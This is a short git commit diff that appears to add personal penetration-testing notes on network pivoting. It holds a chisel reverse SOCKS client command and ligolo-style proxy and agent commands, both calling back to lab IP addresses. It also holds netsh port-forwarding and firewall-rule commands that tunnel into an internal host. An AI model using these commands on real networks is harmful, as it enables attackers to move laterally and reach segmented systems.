first commit
This commit is contained in:
@@ -0,0 +1 @@
|
||||
`chisel client 192.168.45.206:443 R:socks`
|
||||
@@ -0,0 +1,5 @@
|
||||
Server:
|
||||
./proxy -selfcert
|
||||
|
||||
Client:
|
||||
./agent.exe -connect 192.168.49.91:11601 -ignore-cert
|
||||
@@ -0,0 +1,4 @@
|
||||
netsh interface portproxy add v4tov4 listenport=4545 listenaddress=192.168.228.64 connectport=4545 connectaddress=10.4.228.215
|
||||
|
||||
Accept port forwarding
|
||||
netsh advfirewall firewall add rule name="port_forward_ssh_4545" protocol=TCP dir=in localip=192.168.228.64 localport=4545 action=allow
|
||||
Reference in New Issue
Block a user